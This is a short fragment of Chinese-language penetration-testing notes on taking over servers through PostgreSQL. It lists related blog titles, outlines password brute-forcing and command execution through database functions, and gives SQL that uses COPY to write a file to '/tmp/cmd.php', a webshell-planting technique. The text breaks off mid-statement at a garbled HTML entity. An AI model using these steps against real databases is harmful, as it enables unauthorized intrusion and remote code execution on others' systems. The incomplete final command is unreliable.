(168条消息) 利用postgresql getshell_yusec的博客-CSDN博客
PostgreSQL弱口令getshell - renblog - 博客园 (cnblogs.com)
渗透中利用postgresql getshell | CN-SEC 中文网
1.postgreSQL数据库暴力猜解 猜解成功后可进行的操作 - 可对数据库进行操作(增、删、改、查) - 可通过数据库函数执行系统命令 2.postgreSQL注入
drop table pwn;
create table pwn (t TEXT);
insert into pwn(t) values ('');
select * from pwn;
copy pwn(t) to '/tmp/cmd.php';
drop table pwn;
//使用数据库写文件
copy (select &#